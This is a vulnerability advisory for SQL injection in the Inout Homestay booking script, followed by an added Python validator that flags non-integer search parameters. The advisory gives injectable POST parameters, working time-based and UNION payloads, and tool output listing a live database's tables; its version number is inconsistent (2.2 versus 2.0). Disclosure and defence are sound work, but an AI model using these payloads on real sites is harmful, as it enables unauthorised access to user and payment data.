Inout Homestay 2.2 SQL Injection
Inout Homestay version 2.0 suffers from a remote SQL injection vulnerability.
CraCkEr
THE CRACK OF ETERNAL MIGHT
From The Ashes and Dust Rises An Unimaginable crack....

[ Vulnerability ]

Author    : CraCkEr
Website   : inoutscripts.com
Vendor    : Inout Scripts - Nesote Technologies Private Limited
Software  : Inout Homestay 2.2
Vuln Type : SQL Injection
Impact    : Database Access

Release Notes:
==============

SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation.

Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL

CryptoJob (Twitter) twitter.com/CryptozJob

© CraCkEr 2023

Path: /index.php?page=search/searchdetailed

broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis

POST parameter 'broom' is vulnerable to SQLI
POST parameter 'bathr' is vulnerable to SQLI
POST parameter 'beds' is vulnerable to SQLI
POST parameter 'numguest' is vulnerable to SQLI

Path: /index.php?page=search/rentals

location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana

POST parameter 'guests' is vulnerable to SQLI

---
Parameter: broom (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split

    Type: UNION query
    Title: Generic UNION query (NULL) - 27 columns
    Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split
---

[INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0.12

[INFO] fetching tables for database: '*****_homestay'

Database: *****_homestay
[52 tables]
+----------------------------------+
| admin_account                    |
| admin_payment_details            |
| category_property                |
| chat_details                     |
| chat_messages                    |
| checkout_ipn                     |
| countries                        |
| coupon_detail                    |
| cron_details                     |
| custom_field                     |
| demo_message                     |
| email_details                    |
| email_templates                  |
| forgetpassword                   |
| host_rejected                    |
| inout_ipns                       |
| languages                        |
| list_date_request                |
| list_images                      |
| listing_date                     |
| listing_detail                   |
| listing_main                     |
| message_notify_app               |
| messages                         |
| msg_req_temp                     |
| ppc_currency                     |
| public_side_media_detail         |
| public_slide_images              |
| refund_creditupdate              |
| request_coupon_detail            |
| settings                         |
| superhost_detail                 |
| traveller_bank_deposit_history   |
| traveller_cancellation_modes     |
| traveller_cancelled              |
| user_account_detail              |
| user_address_verify_request      |
| user_details                     |
| user_email_verification          |
| user_listing_request             |
| user_refunddetails               |
| user_registration                |
| user_reviews                     |
| user_search_details              |
| user_settings                    |
| user_wishlist_mapping            |
| user_withdrawal_details          |
| userabusereport                  |
| userbank_pending_listing_request |
| usercancellationsaction          |
| wish_list                        |
| withdrawal_request               |
+----------------------------------+

[-] Done
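
In the advisory's sample requests, every parameter reported as injectable (broom, bathr, beds, numguest, guests) carries a small integer. The following check is an added example, not part of the original advisory or the vendor's code: it flags POST bodies in which any of those fields is not a plain integer, and can be used for request validation in front of the application or for reviewing captured request logs. The function name, the 4-digit limit and the treatment of empty values are assumptions; the sample bodies are built from requests shown in the advisory.

```python
import re
from urllib.parse import parse_qs

# Parameters the advisory reports as injectable, keyed by the "page" route.
NUMERIC_PARAMS = {
    "search/searchdetailed": ("broom", "bathr", "beds", "numguest"),
    "search/rentals": ("guests",),
}

# Assumption: legitimate values are empty or a non-negative integer of at
# most 4 digits, matching the advisory's samples (broom=1, numguest=2).
PLAIN_INT = re.compile(r"[0-9]{0,4}")


def non_integer_params(page, body):
    """Return {param: value} for every checked field that is not a plain integer.

    All occurrences of a repeated parameter are inspected, so a clean first
    copy cannot hide a tampered second one.
    """
    fields = parse_qs(body, keep_blank_values=True)
    flagged = {}
    for name in NUMERIC_PARAMS.get(page, ()):
        for value in fields.get(name, []):
            if not PLAIN_INT.fullmatch(value):
                flagged[name] = value
    return flagged


# Constructed sample input: the advisory's search request with the
# [Inject-HERE] markers removed, and the same request carrying the
# time-based value the advisory lists for 'broom'.
BENIGN = ("broom=1&bathr=1&beds=1&location=Indianapolis, IN, USA"
          "&indate=&outdate=&numguest=2&property1=1&type=2&type=2")
TAMPERED = ("broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)"
            "&bathr=1&beds=1&numguest=2")

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("tampered", TAMPERED)):
        print(label, non_integer_params("search/searchdetailed", body))
```

A check like this only narrows what reaches the application; the underlying fix is for the search queries to bind these values as typed parameters instead of concatenating them into SQL.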